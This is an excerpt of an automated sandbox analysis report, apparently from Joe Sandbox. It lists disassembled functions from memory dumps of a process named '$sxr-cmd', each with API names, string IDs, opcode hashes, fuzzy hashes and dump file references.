                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: wcschr$Heapiswspacememset$AllocProcess
                                                                                                                      • String ID: %s
                                                                                                                      • API String ID: 2401724867-3043279178
                                                                                                                      • Opcode ID: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                                                                                                                      • Instruction ID: 16db4bf517c86123a5de5c680fd259fc2db50d8fda79f79e4256b0d86a9a3ae3
                                                                                                                      • Opcode Fuzzy Hash: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                                                                                                                      • Instruction Fuzzy Hash: 19519136B08A82C6EB618F25D8502B9B7A0EB49FA8F445135DA5D877B4EF3CE855C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: iswdigit
                                                                                                                      • String ID: GeToken: (%x) '%s'
                                                                                                                      • API String ID: 3849470556-1994581435
                                                                                                                      • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                                      • Instruction ID: a99fd361767858c30d43167fbb092e6352e8450d644a5836acae4ebcf33f7f48
                                                                                                                      • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                                      • Instruction Fuzzy Hash: 68514836A08E52C9E7A49F59E444179B7A0BB44F65F458436DA4DC37A0EF7CEC60C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF615519A10
                                                                                                                      • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF615519994
                                                                                                                        • Part of subcall function 00007FF61551A73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF615519A82), ref: 00007FF61551A77A
                                                                                                                        • Part of subcall function 00007FF61551A73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF615519A82), ref: 00007FF61551A839
                                                                                                                        • Part of subcall function 00007FF61551A73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF615519A82), ref: 00007FF61551A850
                                                                                                                      • wcsrchr.MSVCRT ref: 00007FF615519A62
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$CloseEnumOpenwcsrchr
                                                                                                                      • String ID: %s=%s$.
                                                                                                                      • API String ID: 3242694432-4275322459
                                                                                                                      • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                                                      • Instruction ID: e3a5520c7ebe491a086345f5bc5723e561a83e0067193ee6f8e6a397654be613
                                                                                                                      • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                                                      • Instruction Fuzzy Hash: 4241A229A09F4286EE149F2590902BAEAB1AF85FB0F444135DD5E877F6EF7CEC458300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6155154E6
                                                                                                                      • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF61551552E
                                                                                                                        • Part of subcall function 00007FF61551758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF615516999,?,?,?,?,?,00007FF615508C39), ref: 00007FF6155175AE
                                                                                                                        • Part of subcall function 00007FF61551758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF615516999,?,?,?,?,?,00007FF615508C39), ref: 00007FF6155175C6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$CreateCurrentMutexProcess
                                                                                                                      • String ID: Local\SM0:%d:%d:%hs$wil$x
                                                                                                                      • API String ID: 779401067-630742106
                                                                                                                      • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                                                      • Instruction ID: 612d18bc2a0529ced59798d51fa4c862b225ecf12447f3a98be775eeb743f672
                                                                                                                      • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                                                      • Instruction Fuzzy Hash: B8518736618E4282EB119F25E4807FAE770EB84FA8F554031DA4DCBA65DF3CD9058740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentDirectorytowupper
                                                                                                                      • String ID: :$:
                                                                                                                      • API String ID: 238703822-3780739392
                                                                                                                      • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                                      • Instruction ID: 08b971ac2a0aefc0aa946216309351c1ee91483f4568afcec2ea5dd19dce2ccf
                                                                                                                      • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                                      • Instruction Fuzzy Hash: 1011085A608A41C5EB158B61A805279FAE0FF89FA9F458132DD0DC77B1DF3CD8418704
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                      • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                                                      • API String ID: 3677997916-3870813718
                                                                                                                      • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                                      • Instruction ID: 7feb4604135d8a52894b0b9c600b4116cfa4eb991e969ba635a4d6eb73d185b3
                                                                                                                      • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                                      • Instruction Fuzzy Hash: 3311F876619A41C7EA108B64E44466AFBA4FB8AB64F404236DA8D42768DF7CD858CF00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FinalHandleNamePathlstrlen
                                                                                                                      • String ID: \\?\
                                                                                                                      • API String ID: 2719912262-4282027825
                                                                                                                      • Opcode ID: b063e99747d40705daecabcc818f010f8e057a4149015bdb718489c079619189
                                                                                                                      • Instruction ID: c6ee467f2019adcf30e35311e5906f71827505d4bdf7e0f330f219c2c6f00fad
                                                                                                                      • Opcode Fuzzy Hash: b063e99747d40705daecabcc818f010f8e057a4149015bdb718489c079619189
                                                                                                                      • Instruction Fuzzy Hash: 2CF03162309B4192F720DB91E5983596772F744FA9FC48024DA4D4EA56EE6DC688CB04
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CombinePath
                                                                                                                      • String ID: \\.\pipe\
                                                                                                                      • API String ID: 3422762182-91387939
                                                                                                                      • Opcode ID: 275731b5076b0e6dc254ebb2ecc66cd3e96493bb62629767b69f00e53740df4b
                                                                                                                      • Instruction ID: 973d7aaf6d46ef38caf1f53042c0d18492fd17cba469c57747672edf3cf94c8b
                                                                                                                      • Opcode Fuzzy Hash: 275731b5076b0e6dc254ebb2ecc66cd3e96493bb62629767b69f00e53740df4b
                                                                                                                      • Instruction Fuzzy Hash: 17F0826070AB8092FA04CB93B9591196272FB48FE1F849130DE4E0BB2AEF2DC4818708
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                      • Opcode ID: 998d7d4103a02a9e6d60ca2871a9eec56d3e9844af320b42809f87498ae3ac58
                                                                                                                      • Instruction ID: e165655f82cbe2bbfdfdb0879194a0212bc20e2cc92ba799f731217b56fd6234
                                                                                                                      • Opcode Fuzzy Hash: 998d7d4103a02a9e6d60ca2871a9eec56d3e9844af320b42809f87498ae3ac58
                                                                                                                      • Instruction Fuzzy Hash: 21F0DA6161BB4091FB548BE0E4883656372EB48B61F881029D51F4A666EF6AC498C714
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2882836952-0
                                                                                                                      • Opcode ID: 09a1da4ea647e200bc3592a5ab7a7466c61b6a393229a681a1c2ded621564b7f
                                                                                                                      • Instruction ID: aaa9ecf78f6855a1ff9c4810f0f587e047158424a430deac6c71ef7417f20e84
                                                                                                                      • Opcode Fuzzy Hash: 09a1da4ea647e200bc3592a5ab7a7466c61b6a393229a681a1c2ded621564b7f
                                                                                                                      • Instruction Fuzzy Hash: 4702DC3221EB8486EB60CB95F49435AB7B1F3D4794F504125EA8E8BBA9EF7DC444CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2210144848-0
                                                                                                                      • Opcode ID: 805c3f4572016d1162eba903c1866f821554d6bcbc59870d2561a84f84d0e957
                                                                                                                      • Instruction ID: 5a742476be3838df04a20d0c2adcc28e5e263ddcb40bf654d77dae0485640db6
                                                                                                                      • Opcode Fuzzy Hash: 805c3f4572016d1162eba903c1866f821554d6bcbc59870d2561a84f84d0e957
                                                                                                                      • Instruction Fuzzy Hash: A981CF22A1AB4099FB10DBE498483AD67B3F744FA8FC44115DE0E5B797EB3B8449C710
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memsetwcsrchr$wcschr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 110935159-0
                                                                                                                      • Opcode ID: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                                                                                                      • Instruction ID: 5dbbeb76c033f40895f61526ed5eb3583873754c4843f13c5523f7726c64deb5
                                                                                                                      • Opcode Fuzzy Hash: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                                                                                                      • Instruction Fuzzy Hash: 9551B466B09B8285FE218F1A98447F9A6A0BF48FB4F444531CE5E8B7A4DF3CE9518300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memset$CurrentDirectorytowupper
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1403193329-0
                                                                                                                      • Opcode ID: 75a07d5bd23dcdf46afeab1086ab6ee4728832850a12a13c2f157218a155009a
                                                                                                                      • Instruction ID: 66e09ee36f043934104e5b2ea6f5ea10e1ab11ef5e62028446f0d4bc188d5ba9
                                                                                                                      • Opcode Fuzzy Hash: 75a07d5bd23dcdf46afeab1086ab6ee4728832850a12a13c2f157218a155009a
                                                                                                                      • Instruction Fuzzy Hash: 6351B72AA05A8185EB24DF20D9506BAB7A0FF44F6CF558136DA1DC76A4EF3CE9448710
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • memset.MSVCRT ref: 00007FF6154F921C
                                                                                                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6154F93AA
                                                                                                                        • Part of subcall function 00007FF6154F8B20: wcsrchr.MSVCRT ref: 00007FF6154F8BAB
                                                                                                                        • Part of subcall function 00007FF6154F8B20: _wcsicmp.MSVCRT ref: 00007FF6154F8BD4
                                                                                                                        • Part of subcall function 00007FF6154F8B20: _wcsicmp.MSVCRT ref: 00007FF6154F8BF2
                                                                                                                        • Part of subcall function 00007FF6154F8B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6154F8C16
                                                                                                                        • Part of subcall function 00007FF6154F8B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6154F8C2F
                                                                                                                        • Part of subcall function 00007FF6154F8B20: wcschr.MSVCRT ref: 00007FF6154F8CB3
                                                                                                                        • Part of subcall function 00007FF61550417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6155041AD
                                                                                                                        • Part of subcall function 00007FF615503060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF6154F92AC), ref: 00007FF6155030CA
                                                                                                                        • Part of subcall function 00007FF615503060: SetErrorMode.KERNELBASE ref: 00007FF6155030DD
                                                                                                                        • Part of subcall function 00007FF615503060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6155030F6
                                                                                                                        • Part of subcall function 00007FF615503060: SetErrorMode.KERNELBASE ref: 00007FF615503106
                                                                                                                      • wcsrchr.MSVCRT ref: 00007FF6154F92D8
                                                                                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6154F9362
                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6154F9373
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3966000956-0
                                                                                                                      • Opcode ID: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
                                                                                                                      • Instruction ID: 585f960b818988d9b2eb8a725dac56179f1a3d49a279115f1a8e82410e9c020d
                                                                                                                      • Opcode Fuzzy Hash: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
                                                                                                                      • Instruction Fuzzy Hash: 71518736A09F8285EB619F29D8502B9B3A0FF49F64F144036DA4D87BA5DF3CE965C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2882836952-0
                                                                                                                      • Opcode ID: 98b2d38467aad0f12371f4981a99e71c5d2d9a384676790713b3d681f93ff9b7
                                                                                                                      • Instruction ID: ad4e23bcd7e08d9c55c416e097f9322c92f4db55f064fc91f288cac7c7d56d0f
                                                                                                                      • Opcode Fuzzy Hash: 98b2d38467aad0f12371f4981a99e71c5d2d9a384676790713b3d681f93ff9b7
                                                                                                                      • Instruction Fuzzy Hash: 3761DC3251EB84C6F760DB99E44931A77B1F398764F900116EA8E4BBA6EB7DC550CF00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memset$_setjmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3883041866-0
                                                                                                                      • Opcode ID: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                                                                                                      • Instruction ID: d501803328dac01566c0c03de5b55141407d4da2f336b8d556a25ad2b2b56c35
                                                                                                                      • Opcode Fuzzy Hash: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                                                                                                      • Instruction Fuzzy Hash: DC515236A08BC68AEB61CF25D8503E9B7A4FB45F58F404136DA4D87A68DF3CDA45CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _wcsicmp.MSVCRT ref: 00007FF6154FB4BD
                                                                                                                        • Part of subcall function 00007FF6155006C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF6155006D6
                                                                                                                        • Part of subcall function 00007FF6155006C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF6155006F0
                                                                                                                        • Part of subcall function 00007FF6155006C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF61550074D
                                                                                                                        • Part of subcall function 00007FF6155006C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF615500762
                                                                                                                      • _wcsicmp.MSVCRT ref: 00007FF6154FB518
                                                                                                                      • _wcsicmp.MSVCRT ref: 00007FF6154FB58B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
